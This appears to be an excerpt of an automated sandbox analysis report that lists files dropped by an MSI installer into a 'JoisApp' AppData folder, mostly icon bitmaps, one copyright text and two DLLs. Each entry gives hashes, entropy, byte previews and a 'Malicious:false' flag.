                  Preview:BM6.......6...(............................................................................................................................................................................................................................................................................................f..3..3..........f..f..f..f..f..f..f............f..f..3..........f.f.ff.f3.33.33.3.f............f..f..3..........f.f.ff.f...f.f3.3.f............f..f..f..........f.......f.f...3.3.f............f..f..f..........f....f.ff.ff.f....f...............f..f..........f..........f.ff.f.................f..f..........f..f..f..f..f..f..f..................f....................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Delete Column.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):2.05699630427599
                  Encrypted:false
                  SSDEEP:
                  MD5:1AD4A4586336189A8A2D80D069A67D3F
                  SHA1:0FB2B75A662E29E5ADD94DB861751E8069B3FC4B
                  SHA-256:93E22781B25453EDB49345FADCDC3EB18336E69D2B5BA425DD346D9B36A9C490
                  SHA-512:8C6209A10CE41C65BB6F4809DF0B19D9E2AEBA311F0F19F90286C5550548D809B3681F5B4165CD905F46490FBA7553CCD30C80EB48927B375991390CB5C7A45B
                  Malicious:false
                  Preview:BM6.......6...(............................................................................................................................................f..3..3.........ff.ff.........f..3..3...........f..f..3............ff.........f..f..3...........f..f..f.......................f..f..f..............f..f..........................f..f.................f.............................f.......................................................................................................................................................................................................................f...........f......................................f.....f............................................f............................................f.....f......................................f...........f..................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Delete Row.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):2.058854696679015
                  Encrypted:false
                  SSDEEP:
                  MD5:6792D705A8BC023BC27717A63000903A
                  SHA1:76CCFF5E77DA47842A6F99A50F46526BD02A6D2A
                  SHA-256:7E9A67FE279E9C691E377225ABE8EE53507690DAF44183E716BABF21AFF9F6D6
                  SHA-512:722850726DA3A4E75F793A9F56F30FF40D5FA5E51B67E881EEC39FD21FC7DB9E80AEC4A26E81AE248E3EF08AE0D38699B1342BA2121A71C41685D9EAE4317D69
                  Malicious:false
                  Preview:BM6.......6...(............................................................................................................................................f..f..f..3..3......................................f..f..f..3.........................................f..f..f.................................................................................................................f...........f............ff.ff.....................f.....f..................ff........................f............................................f.....f......................................f...........f.....................................................f..f..f..3..3......................................f..f..f..3.........................................f..f..f..............................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Delete.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):1.701024237893803
                  Encrypted:false
                  SSDEEP:
                  MD5:45B3B46C7B13D56C5EE96988F20903A0
                  SHA1:C9D79F8A589468D5AC8FB0A948AB3DD92EBA74EE
                  SHA-256:D089CA028AC2AC5023E71A566F1D4F92B451752DEF86E8BB960C0FF6ED9B5AF2
                  SHA-512:717D5215B1EC1A40972F62EA782061824ECB6A936F8883708444C0F338D001E3C0C56AE5442AFE9B95483A6B2E6BF1963DE0B1F30AA95D281B3DE027663E7F8F
                  Malicious:false
                  Preview:BM6.......6...(..........................................................................................................................................................................f...........f......................................f.....f............................................f............................................f.....f...............ff.ff.ff.ff............f...........f.....................ff..............................................ff..............................................ff..............................................ff.........................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Duplicate.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):2.2023915485583316
                  Encrypted:false
                  SSDEEP:
                  MD5:88310A434CA4F0B6EAC11EEF5DB9F729
                  SHA1:F450FBBD8BDAA3E02ECD9B8415F5727B872E660E
                  SHA-256:B8C2BCC4B83D1C3598694DCABEF1BF0DDD98E3EE66DA83A2B4BC3168F62712EA
                  SHA-512:981901047BAC0E5386DD111016EE53CD97BB16001086A5BF9CE0365B2161680DD9C832091049FF04AC049FCCC8225E12E33AA285B19A8F741A2F7D4AE2292051
                  Malicious:false
                  Preview:BM6.......6...(....................................................................................................................................................3............................................3..3..3........f..f..f..f..f..f..f.................3...........f.f.ff.f3.33.33.3.f.............................f.f.ff.ff.ff.f3.3.f.............................f....f.ff.ff.f3.3.f.....f..f..f..f..f..f..f.....f....f.ff.ff.f3.3.f.....f.f.ff.f3.33.33.3.f.....f....f.ff.ff.ff.f.f.....f.f.ff.ff.ff.f3.3.f.....f..........f.ff.f.f.....f....f.ff.ff.f3.3.f.....f..f..f..f..f..f..f.....f....f.ff.ff.f3.3.f.............................f....f.ff.ff.ff.f.f...........3.................f..........f.ff.f.f........3..3..3..............f..f..f..f..f..f..f...........3................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Hide Report.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):1.9694221227788473
                  Encrypted:false
                  SSDEEP:
                  MD5:D5BEC74C9D29B35809EF4F0CBDF27949
                  SHA1:5315151300CB0520B80A48A6D00D955BF8C9CE56
                  SHA-256:8B42D86F2A8693D4EDEB0A3FDD4A18054D01674399702A03B732D320F9085BB6
                  SHA-512:1A669C07370C755F00D2FEDA57EE8A6DF406F8285D23073167C768038BD1AD50B28280574C594CB0E89A05CBE6F6D91075242EF2484A19AE06EE79941C5716B8
                  Malicious:false
                  Preview:BM6.......6...(.............................................fffffffffffffffffffffffffffffffffffffff.............................................fff.............................................fff.............................................fff.............................................fff.............................................fff.............................................fff.............................................fff.............................................fff.............................................fff.............................................fff.............................................fff.............................................fff.............................................fff.............................................fff...................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Icon Copyright.txt

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:ASCII text
                  Category:dropped
                  Size (bytes):95
                  Entropy (8bit):4.654368667181424
                  Encrypted:false
                  SSDEEP:
                  MD5:2BE114404B8072A1787DE7B26066BEBD
                  SHA1:686B8A45CC9FEB049C9C98336A05ED6E5AECFE7A
                  SHA-256:AE1844528091AF556EAB9B597B560692CA0A02D366E00EADF1354E1FD336ED46
                  SHA-512:762A79F115A88230767C9E5B070A5A47978D68B4EF7482FA4D8E88BEE4F67063058626D70A35E5A2E6B9338240E7F30119B5645A7CFDEA05350D59DC44B482A9
                  Malicious:false
                  Preview:Icons copyright 2004, 2005 by Alexander V. Christensen.Permission granted for use with GanttPV.

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Insert Column.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):2.04386646975616
                  Encrypted:false
                  SSDEEP:
                  MD5:E62D2FC076CC2D0C92838484C2F5EC6C
                  SHA1:132872719DB0703396A853D688C0F2AF82BE3B62
                  SHA-256:C00189FA68D6F3936102DF62FDF13177A5E8C8094D69DC019E8D95612D8056A5
                  SHA-512:7364CB0C341973C4EE34D4BF8EB8208EBB6E38B64CFF6AFA78AAB7E0784A5317BDB47AD313E4495A86C34B9E4B02413BBE9EB92DA1AE2658F9C0B949479D60E8
                  Malicious:false
                  Preview:BM6.......6...(............................................................................................................................................f..3..3..........f............f..3..3...........f..f..3..........f..f.........f..f..3...........f..f..f..........f............f..f..f..............f..f..........f...............f..f.................f..........f..................f............................f...............................................f................................3........f..f..f..f..f.......................3..3..3.....f.f.f3.33.3.f..........................3........f.f.ff.f3.3.f...................................f.f.ff.ff.f.f...................................f....f.ff.f.f...................................f.......f.f.f...................................f..f..f..f..f...................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Insert Report.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):2.2928423029965486
                  Encrypted:false
                  SSDEEP:
                  MD5:E8AE00D4FCEE69FF0E59E9F246123B34
                  SHA1:BB20005D97259217192FE75D9C70A03D766703F7
                  SHA-256:BBF7D0E278F26B193860206AF9D9C72BD521F0BFF64B7F693673E1541B91C839
                  SHA-512:E6B0D21C3C8A05B3723135FD50F9873423DE00CEE881AC3CB645039C6658B3B0CB5EBAF3AD23AD6B94C5C9733639A2F2AA1C64F485D71D23DDF851F2B86DA7AF
                  Malicious:false
                  Preview:BM6.......6...(...............................................................................3............................................3..3..3...............f..f..3..3..3..3.............3..................f..f..f........3...................................f..f..f..f..3...................................f........f..3.......f..f..f.....................f..f..f..f..3......3.33.3.f...........................f..f..f.......f.3.3.f............f.................f..f......f.f3.3.f............f.........................f.f.f3.3.f...............f..f..f..f.f....f.ff.ff.ff.f3.3.f...............f........f.f.....f..f.f.ff.ff.f.f...............f..f..f..f.f.............f.ff.f.f.....................f..f.f..f..f..f..f..f..f..f........................f..f...........................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Insert Row.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):2.041173704120979
                  Encrypted:false
                  SSDEEP:
                  MD5:3E5A0DDD80541905D6E012FD5FB54AAC
                  SHA1:899AA2A1AF047B4F244CB7974E3702E17EB1893A
                  SHA-256:4B22C5AFDA48173FB581D02099E4D5CFEBA1B859431E380F6F5FA6FE1FD24856
                  SHA-512:D009ED6EB2D29F1151AE4FB8AB9B56A7FAFB71ED0291F0C1379A530AAA8E62EEFDDA303CC3B67F767DB4A6FC873A521F36D69C15D8FEEC56BCA0FC82ECE635A5
                  Malicious:false
                  Preview:BM6.......6...(......................................................................................................................3.....................f..f..f..3..3..........3..3..3.....................f..f..f..3.............3...........................f..f..f.......................................................................................................f..f..f..f..f..f..f..............f..............f.f.ff.ff.f3.33.3.f...........f..f..f..f..f..f..f....f.ff.ff.f3.3.f.............................f.......f.ff.ff.f.f.............................f..f..f..f..f..f..f.........................................................f..f..f..3..3......................................f..f..f..3.........................................f..f..f..............................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Move Down.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):1.7920940508231251
                  Encrypted:false
                  SSDEEP:
                  MD5:D2F9E78F10840D37678EF86E3E9CBBCA
                  SHA1:2FBE06ACCB4F5AD6CC305E66BE35CBF38B04DD4C
                  SHA-256:A37E249C985417B809CEA95C12194791E4C3CBE8466AD30C9E257DB6A0682C6B
                  SHA-512:4C4149503C1DEF1D0AA341A5DCB62460C17E9AD49DF9EC7FBB46D2130C7DFF4914C02F12F5F85E1EF51ED32B042334B72910FE031D05D4E5AA1A1DBE0E4F1DC1
                  Malicious:false
                  Preview:BM6.......6...(.............................................................................................................................................................3f...........................................3f....3f.....................................3f..........3f...............................3f................3f.........................3f......................3f......................3f.3f.3f..........3f.3f.3f............................3f..........3f.............................................................................................................................f..f..f..f..f..3..3..3.............................f..f..f..f..f..f..3...................................f..f..f..f..f...............................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Move Left.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):1.767441642011123
                  Encrypted:false
                  SSDEEP:
                  MD5:503FE8AAF5EF0DFBEDA0C7C1E7DF35FC
                  SHA1:2353F20E68F3B9D52B3113CCBACA4AF8CE55A15D
                  SHA-256:A603FD88099F1750A8A63D13FC9A0B5482491474A01F4EBC47F6F140AB74B722
                  SHA-512:E0CEF289D0154B24420E99A58C142D9A701529E4A0EF94F4209E132D5034B12C7674A53988EB4D06C97BDB85D6A7B5B003017DB74DBBB01C69D24451DF0938A3
                  Malicious:false
                  Preview:BM6.......6...(.......................................................................................................................................................................................................................................................3f.3f........................................3f....3f........f..3..3......................3f.......3f.3f.....f..f..3...................3f....................f..f..3................3f.......................f..f..f...................3f....................f..f..f......................3f.......3f.3f........f..f.........................3f....3f...........f..f............................3f.3f..............f............................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Move Right.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):1.7773627109619747
                  Encrypted:false
                  SSDEEP:
                  MD5:597A57FAF7DEBC6939633649BADD8B5C
                  SHA1:391877AC897A654BD43B1C2E1D0CA709F2393E40
                  SHA-256:A4615B719F974075BBA1D807B09B66280ABB43D64C323BCC1E6BF0064E14C4E2
                  SHA-512:490A46AE7F8047B49516941DDBA615482360886ED2411AB7620EB3A17996F11490A819FA73D55B9943CF75DD04B62EEBEF030BE64FBDE84A3A74D7C62D0253C5
                  Malicious:false
                  Preview:BM6.......6...(...................................................................................................................................................................................................................................................................3f.3f..........................f..3..3..........3f....3f.......................f..f..3.......3f.3f.......3f....................f..f..3......................3f.................f..f..f.........................3f..............f..f..f......................3f....................f..f.......3f.3f.......3f.......................f..f..........3f....3f.............................f..........3f.3f...............................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Move Up.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):1.7773627109619747
                  Encrypted:false
                  SSDEEP:
                  MD5:42A0A5876AC111B2257709A0B0F0C8E6
                  SHA1:8410A2FAA04029B53050DF53676D3C8DC721BE75
                  SHA-256:B68648513775B572AE1ABF0F2F8DC7A9443FFF9A35F4CD0C4479688849E47D06
                  SHA-512:064041F543391F189E214C96F44701A1D9F86CC6BB17D6DE256BB09F87715C72783C679709DE0260F8B37BF6D5CF9E9D01BF97F387BCBD1E4DEAF27EFC8ED0DD
                  Malicious:false
                  Preview:BM6.......6...(..................................................................................................................................................................................................................................................f..f..f..f..f..3..3..3.............................f..f..f..f..f..f..3...................................f..f..f..f..f...............................................................................3f..........3f............................3f.3f.3f..........3f.3f.3f......................3f......................3f.........................3f................3f...............................3f..........3f.....................................3f....3f...........................................3f........................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\New Project.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):2.4010336083343535
                  Encrypted:false
                  SSDEEP:
                  MD5:86EE731789B64420405A0C7F9F2C25AB
                  SHA1:899FD10D70805F36F609A5DFA02FBAEF0A25BDFD
                  SHA-256:60BFDFC9E75345A4FD5C722E2497381719E1C3A1943D7A6A708257899A72F2D7
                  SHA-512:9D4BF54FAF8E44D78B577E699E132B34F98A3EFB05F6C01D0F5878D08416E5A4BC88E3D03AAC98A120CB799896A99423359AC506A72057857F4515C7586D02E6
                  Malicious:false
                  Preview:BM6.......6...(...........................................................................................f..f..f..f..f..f..f..f..f..f..f..f..f...........f.f.ff.f3.33.33.3.f.f.ff.f3.33.33.3.f...........f.f.ff.ff.ff.f3.3.f.f.ff.ff.ff.f3.3.f...........f....f.f.f..f..f..f..f..f..f.f.f3.3.f...........f....f.f.f.f.ff.f3.33.33.3.f.f.f3.3.f...........f....f.f.f.f.ff.ff.ff.f3.3.f.f.ff.f.f...........f........f....f.f.3.f.f3.3.f.f.ff.f.f...........f..f..f..f.....3..3..3.3.3.f..f..f..f...........f.f.ff.f.f....f.f.3.f.f3.3.f.3.33.3.f...........f.f.ff.f.f....f.ff.ff.ff.f.f.f.f3.3.f...........f....f.f.f..........f.ff.f.f.f.f3.3.f...........f....f.f.f..f..f..f..f..f..f.f.f3.3.f...........f....f.ff.ff.ff.f.f....f.ff.ff.ff.f.f...........f..........f.ff.f.f..........f.ff.f.f...........f..f..f..f..f..f..f..f..f..f..f..f..f.......

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Pencil.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, image size 768, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):1.3831318937888808
                  Encrypted:false
                  SSDEEP:
                  MD5:660A80AC32A7DE07D46A906AD18C3A20
                  SHA1:CD9379B1DB39CA72B88E8E8978C45487814015FC
                  SHA-256:93533944518985344DB7F532E201FBA5833CDCBD0A6637C9CC43B4D992C3BC31
                  SHA-512:D6DFFACA0E873EFB2656843EB3A7A58286100EE10043EB29E86C407AE14AFC719071747FF8F44D0D0ED33287AF29B489FB59CAF52BF0E4736A97518E1CC47447
                  Malicious:false
                  Preview:BM6.......6...(.......................................................................................................................................................3f...........................................3f....3f........................................3f..............................................3f.......3f........................................3f..............................................3f.......3f........................................3f..............................................3f.......3f........................................3f..............................................3f.......3f........................................3f..............................................3f.....fff..........................................fff.ff..........................................f..f..f............

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Pointer.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, image size 768, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):1.2652819025197999
                  Encrypted:false
                  SSDEEP:
                  MD5:4C933C02D87761BA3BD654FAB9830A3C
                  SHA1:12D3F5C476176E02906E0E9B8F04070E1BFB1EA9
                  SHA-256:03962A990EB2359DE6258816EB7EFEDBD75D8AB511DA62AD5B8656078F42A1FF
                  SHA-512:E78A36896A9E264413A7320C46E670869754CE694B84781DB56835FAD663015408C6D2E9812E3E8B76508EE5EFA93BB14701EF14089BEEA7C861D0D2D20A594D
                  Malicious:false
                  Preview:BM6.......6...(.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Report.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):2.3644380727352345
                  Encrypted:false
                  SSDEEP:
                  MD5:E658179CF655D9BAADAFA7FA9A8AD916
                  SHA1:F102194122C401DC1217C72B107F486E01F141DD
                  SHA-256:FA1FB4AE6A51DF3295EDDCAB8D19CB9B0B4139FC78A85DFAEFEF24B501DD2385
                  SHA-512:4CDA72F54A2C4A03F218F3774EEC5B1298A640143472B93D76CC7C08C339B008A34E764DA0F4D64B23F55B1E0BC4F26015235AF9C3F9384CFD17FD6B6201EB2D
                  Malicious:false
                  Preview:BM6.......6...(...............................................................................................................................................f..f..3..3..3..3..3..3..3..3..3.................f..f..f..f..f..3..............3....................f..f..f..f..3..3...........3....................f..f..f..f..3..3..3........3....................f..f..f..f..f..f..f..f..f..3....................f..f..3..............f..f..3....................f..f..3..3...........f..f..3....................f..f..3..3..3........f..f..3....................f..f..f..f..f..f..f..f..f..3....................3..............f..f..f..f..3....................3..3...........f..f..f..f..3....................3..3..3........f..f..f..f..f............................................f..f.........................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Scroll Left Fast.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):1.5099827180334706
                  Encrypted:false
                  SSDEEP:
                  MD5:F95C9623EB5109FAEF551AF6F0056BAF
                  SHA1:DF8D81F366FA91EBF6ECB3D9A645C6FF76A4E151
                  SHA-256:D2C1AB34760E7F424330CFBF0F74EC08DE09AF24ACE55044ACC1FA262AA24BCB
                  SHA-512:C274A890A458EE30930576306C701C88464DA20A5AF7EB56ED37A4CBB31BE35FEA4BE2AD90A4E6DDC8CDB3C5771DFD86E08C76F2D0C626D1594D8155360E9B5A
                  Malicious:false
                  Preview:BM6.......6...(..........................................................................................................................................................................................................................................................3f.3f..........3f.3f.........................3f....3f.......3f....3f......................3f.......3f....3f.......3f...................3f..........3f.3f..........3f................3f.............3f.............3f...................3f..........3f.3f..........3f......................3f.......3f....3f.......3f.........................3f....3f.......3f....3f............................3f.3f..........3f.3f.........................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Scroll Left Slow.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):1.0837920083552524
                  Encrypted:false
                  SSDEEP:
                  MD5:B269D6CBD494764EF046DC574DFA1269
                  SHA1:DEF15E3638CA21E2B0414E1E0D956ABCAEF6C7C4
                  SHA-256:433444A5738A028C64204156428050A0175700085CCDDDDC559372578D77290E
                  SHA-512:FD13677181323501765C6ED5DD6284AB3F01098DF5289EFC1000C019014A2025FBD25263F803B496788A6796171B253006558C5D9B707EE6C1C0D6CBE49A6023
                  Malicious:false
                  Preview:BM6.......6...(................................................................................................................................................................................................................................................................3f.3f........................................3f....3f.....................................3f.......3f..................................3f..........3f...............................3f.............3f..................................3f..........3f.....................................3f.......3f........................................3f....3f...........................................3f.3f..................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Scroll Right Fast.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):1.515437111715756
                  Encrypted:false
                  SSDEEP:
                  MD5:689CEEF22F64E24BB30B3859C0F63E99
                  SHA1:FF239EA06AB2FA42E338F744FD73181658EE827A
                  SHA-256:8027E3D587C6FE821D0172C7605FEB515D9E44D9CEE1D1533AB6D9B0D0F4E3B6
                  SHA-512:5DD3FC42AB5B6ADDC2519DB8C7EE1E81F6ADA464B2463618145354F6BCA0991C48271AF22339EFB10BC31AC1CB4D989E8864F2937F60440CF89A6419E4D48BB7
                  Malicious:false
                  Preview:BM6.......6...(.................................................................................................................................................................................................................................................3f.3f..........3f.3f............................3f....3f.......3f....3f.........................3f.......3f....3f.......3f......................3f..........3f.3f..........3f...................3f.............3f.............3f................3f..........3f.3f..........3f...................3f.......3f....3f.......3f......................3f....3f.......3f....3f.........................3f.3f..........3f.3f..................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Scroll Right Slow.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):1.0865192051963952
                  Encrypted:false
                  SSDEEP:
                  MD5:3A29CAD4EB3E670BDDF59C852F13073F
                  SHA1:F43E2201B51B39E1E3690C8FB953153291D1503D
                  SHA-256:F535EB1349FA5B8B8E03B4BAC1E6A5BE54CC527CC60C6D06E5C29F7690F2E815
                  SHA-512:63D77802CD26885BA3723C631EE7C764A6008AEBC36E15548A0D561DB516B24D7DCB5766F773B96F80660B0C62D9E28BEF1CD58B2E6318DD67BA7302126C95D5
                  Malicious:false
                  Preview:BM6.......6...(.......................................................................................................................................................................................................................................................3f.3f...........................................3f....3f........................................3f.......3f.....................................3f..........3f..................................3f.............3f...............................3f..........3f..................................3f.......3f.....................................3f....3f........................................3f.3f...........................................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Scroll to Task.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):2.0203789743314697
                  Encrypted:false
                  SSDEEP:
                  MD5:87390EE313845A2C8E33C62F192EDA20
                  SHA1:4E6EFE337211A9AF19C160F3427F98B76FD0E45A
                  SHA-256:60A3EA5724E2AEF1766C93A536950ECE7FE30F815B66C3C7A8104DA5660EA0CD
                  SHA-512:8F2436467B8274CB882356007A28E95EEADFD41F2747819E20FCA32F886EBB683F2DD75412BFCC07CDB8CF1B1DD73BA8C694B22285879DC0BCE82DF1DE5F1B28
                  Malicious:false
                  Preview:BM6.......6...(........................................................................................................................................................................................................................................3f.3f.....................................3f.3f.3f....3f...........f..3..3.............3f....3f.3f.......3f........f..f..3..........3f.......3f.3f..........3f.....f..f..3.......3f..........3f.3f.............3f..f..f..f....3f.............3f.3f..........3f.....f..f..f.......3f..........3f.3f.......3f...........f..f..........3f.......3f.3f....3f..............f..f.............3f....3f.3f.3f....................f................3f.3f................................................................................................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\icons\Show Hidden.bmp

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PC bitmap, Windows 3.x format, 16 x 16 x 24, resolution 2835 x 2835 px/m, cbSize 822, bits offset 54
                  Category:dropped
                  Size (bytes):822
                  Entropy (8bit):1.983130860986226
                  Encrypted:false
                  SSDEEP:
                  MD5:8D92A2FD68161E3054847D31EBBF004F
                  SHA1:83C197DAF353D21AD4ED640F3EA051385FC4A749
                  SHA-256:60A8DB371550D616BEBE903157890498E44E8E171764719E380BFA10D71AF033
                  SHA-512:5929F850B3CD700B86F0D9538EEC5DB4E269B288CC0D5C605431F1AF393D8FF4EF5EF6A2617567EE628A0A61A21A5190BEA08971DFDAB016B164744B0E9E56BF
                  Malicious:false
                  Preview:BM6.......6...(..............................................................................................................................................................................................................f..f..3..3..3..3................................f..f..f........3...................................f..f..f..f..3...............ffffffffffffffffffffffff.....f..3....................................fff..f..f..3....................................fff..f..f..f....................................fff.....f..f....................................fff.............................................fff.............................................fff.............................................fff.............................................fff..................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-audio-io.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):315368
                  Entropy (8bit):5.482537680101961
                  Encrypted:false
                  SSDEEP:
                  MD5:2390EEECA6763D9C4082C48D48D667A3
                  SHA1:EA91AAA2807066EB1F541AC7A65BC51B3036844F
                  SHA-256:70858EF16E071979CFA06C6E701CE35F4C3CC086875213FAA86DD4031ABB004A
                  SHA-512:EF8D090DD41F5CB3984982B3B70CF76C08CE941675E6959B4D979FF5FD256BCE73A7231D2898C281F355AB0F1302EE862F347A9C01A16F28AC5A85503B2B7C71
                  Malicious:false
                  Antivirus:
                  • Antivirus: ReversingLabs, Detection: 0%
                  Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$........<...]...]...]...%f..]..."...]...".]..."...]...".]..."...]..m/.]..m/...]..g ...].....].......]...]...\.....].......].......].......]..Rich.]..........................PE..d.....Ve.........." ...%............(.....................................................`..............................................K...t..X.......<....0..@#......./...... ....3..8....................9..(...`2..@............`...............................text............................... ..`.rdata..............................@..@.data....(....... ..................@....pdata...'...0...(..................@..@.idata..j_...`...`...,..............@..@.tls................................@....00cfg..u...........................@..@.rsrc...<...........................@..@.reloc..............................@..B........................................................................

                  C:\Users\user\AppData\Roaming\Uifie Public Co\JoisApp\lib-basic-ui.dll

                  Download File
                  Process:C:\Windows\System32\msiexec.exe
                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                  Category:dropped
                  Size (bytes):73192
                  Entropy (8bit):4.385699145043612
                  Encrypted:false
                  SSDEEP:
                  MD5:D6EF8BDE07897DB23EFFD478AB425E4C
                  SHA1:A162FE522422D7542FEBEE30DB6C26CA9E831CB8
                  SHA-256:7F60AEF5F40B93B0CA6E4BFFAC1E69E9BD1C9CB9FF0B72449CCE08383F9787EE
                  SHA-512:53412A73B70C40956F98A0781A75400114D9DC154AF00E78F016958A1A1A01DFEE08B430ECFDED4B54622B53761F2A8702EDE00E0ED518DF4A85303F3CC6B8CD
